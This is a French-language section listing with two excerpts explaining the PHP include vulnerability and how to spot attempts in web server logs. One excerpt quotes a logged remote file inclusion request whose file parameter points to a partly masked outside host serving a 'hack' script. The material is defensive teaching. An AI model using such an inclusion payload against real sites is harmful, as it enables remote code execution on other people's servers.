include php
Articles publiés dans cette rubrique
mercredi 22 avril 2009
par
par
Analyse d’un hacking
Analyse d’un hacking ... Analyse de votre fichier de log de votre serveur WEB : grep ’file=http’ access_log #nom de votre fichier de log #2.147.105.2#8 - - [31/Dec/2002:14:11:18 +0100] "GET /linux/index.php ?file=http://#####.sui#zer0.###/hack HTTP/1.1" 200 (…)
mercredi 22 avril 2009
par
par
faille include
auteur : e Et si votre site contenait une grosse faille de sécurité : la faille include de php ???? Si vous avez des liens du type : http://www.site.com/linux/index.php?file=intro.php Alors pas problème ... Le problème est qu’il n’y a peut être pas de vérification sur $page avant (…)